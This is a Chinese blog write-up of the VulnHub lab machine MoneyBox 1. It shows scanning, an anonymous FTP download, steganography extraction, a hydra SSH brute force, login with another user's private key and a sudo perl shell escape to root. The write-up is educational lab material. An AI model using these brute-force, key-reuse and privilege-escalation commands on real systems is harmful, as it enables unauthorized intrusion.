难度 : 中等

目标信息

描述:
难度等级 : 简单
目标:3 个旗帜
前期准备:
靶机地址:https://www.vulnhub.com/entry/moneybox-1,653/

kali攻击机ip:192.168.0.104
靶机ip:192.168.0.103

1)扫描端口以及ip

首先对当前网段进行一个快速扫描

1
2
3
sudo arp-scan 192.168.0.0/24
mac地址做一个比对
192.168.0.103

image.png|450
详细扫描

1
nmap -A -p- -sC -T4 192.168.0.103 -oN nmap.A

image.png|525
扫描结果:

  • 21/tcp: 开放的FTP端口,运行 vsftpd 3.0.3。匿名FTP登录是允许的,其中存在一个名为 "trytofind.jpg" 的文件。
  • 22/tcp: 开放的SSH端口,运行OpenSSH 7.9p1 Debian 10+deb10u2。
  • 80/tcp: 开放的HTTP端口,运行Apache httpd 2.4.38(Debian)。网站标题为 “MoneyBox”。

网站首页

192.168.0.103
image.png|475
查看源码也没发现什么,继续搜集有用的信息

上面的扫描结果允许FTP匿名登陆且其中存在一个名为"trytofind.jpg" 的文件
我们把它下载下来,大概猜测是隐写

1
2
3
4
ftp 192.168.0.103                                                     
Name (192.168.0.103:kali): anonymous
ftp> ls -la
ftp> get trytofind.jpg

image.png
查看图片>一张小猫咪
image.png|500

2)扫描敏感目录

1
sudo dirb http://192.168.0.103/

image.png|450
有个 /blogs 目录,访问一下:http://192.168.0.103/blogs/
image.png|450
查看源码时发现另一个目录S3cr3t-T3xt访问一下
源码中有个Key
image.png
<!--..Secret Key 3xtr4ctd4t4 -->
应该就是上面图片的隐写密钥,检测一下:
找到了一个嵌入在图像中的文本文件 “data.txt

1
sudo steghide info trytofind.jpg

image.png

通过以下步骤在终端上使用 apt 包管理器安装 steghide

1
2
sudo apt update 
sudo apt install steghide

这将会检查并安装 steghide 工具及其依赖项。完成安装后,你就可以在终端中使用 steghide 命令。

提取这个 data.txt 文件

1
steghide extract -sf trytofind.jpg

image.png|500

查看这个文件信息

1
cat data.txt

image.png
得到个用户名 renu,并且提示说是个弱密码,那直接爆破一下

3)ssh 爆破

1
hydra -l renu -P top1000.txt ssh://192.168.0.103 -V -t 64

image.png
得到弱密码为: 987654321

ssh登陆

1
ssh renu@192.168.0.103

image.png|450
登陆成功

4)提权

在当前目录下得到flag1
image.png|450

在另一个lily用户家目录下得到flag2
image.png|450
在对ssh隐藏文件进行一个查看
查看了一下这个用户发现 authorized_keys 是现在这个 renu 用户的
其中包含了一条SSH公钥。这个文件通常用于配置SSH认证,允许特定的用户通过相应的私钥进行无密码登录
image.png

再回到renu用户家目录下对ssh隐藏文件进行一个查看
image.png

  1. id_rsa: 这是您的私钥文件。文件权限设置为 -r--------,表示只有拥有者(renu用户)具有读权限。
  2. id_rsa.pub: 这是与私钥对应的公钥文件。公钥文件通常用于在服务器上进行身份验证。文件权限设置为 -rw-r--r--,表示拥有者有读写权限,而其他用户只有读权限。
    这是一个标准的SSH密钥对配置,其中私钥应该保持机密,而公钥可以与他人共享。请确保私钥文件(id_rsa)得到妥善保护,只有需要访问它的人可以访问。

现在可以尝试用私钥文件进行lily用户得ssh登陆

1
2
ssh lily@192.168.0.103 -i id_rsa
`-i` 选项用于指定用于身份验证的私钥文件

image.png|475
登陆成功

查看用户权限:
image.png|475
发现可以使用perl文件进行提权

https://gtfobins.github.io/gtfobins/perl/

image.png|450
直接借助命令

1
sudo perl -e 'exec "/bin/sh";'

root下在到flag3
image.png|400
提权成功

靶机渗透总结:

1.图片隐写的认知
图片可以嵌入隐藏数据
2.ssh公私钥的认知
3.文件权限提升的利用


MONEYBOX1 靶机提权
http://example.com/posts/54241efd/
作者
帅蛋同学_
发布于
2024年1月8日 12:24
许可协议